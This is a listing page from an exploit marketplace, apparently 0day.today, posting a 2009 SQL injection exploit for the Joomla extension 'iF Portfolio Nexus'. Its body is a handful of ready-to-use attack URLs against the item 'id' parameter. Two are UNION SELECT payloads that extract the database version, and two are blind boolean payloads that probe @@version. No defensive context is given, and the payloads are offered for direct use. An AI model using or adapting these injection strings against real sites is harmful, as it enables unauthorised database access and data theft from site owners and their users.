[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Ext. iF Portfolio Nexus SQL injection

Author
599eme
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9995
Category
web applications
Date add
18-11-2009
Platform
unsorted
============================================
Joomla Ext. iF Portfolio Nexus SQL injection
============================================

# [+] SQL
#
# http://server/portfolio?view=item&id=-100%20union%20all%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
# http://server/portfolio?controller=sections&view=item&id=-71%20union%20all%20select%201,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
#
# [+] Blind
#
# http://server/portfolio?controller=sections&view=item&id=71%20and%20substring%28@@version,1,1%29=5
# http://server/portfolio?view=item&id=100 and substring(@@version,1,1)=5
#
#[--------------------------------



#  0day.today [2024-07-02]  #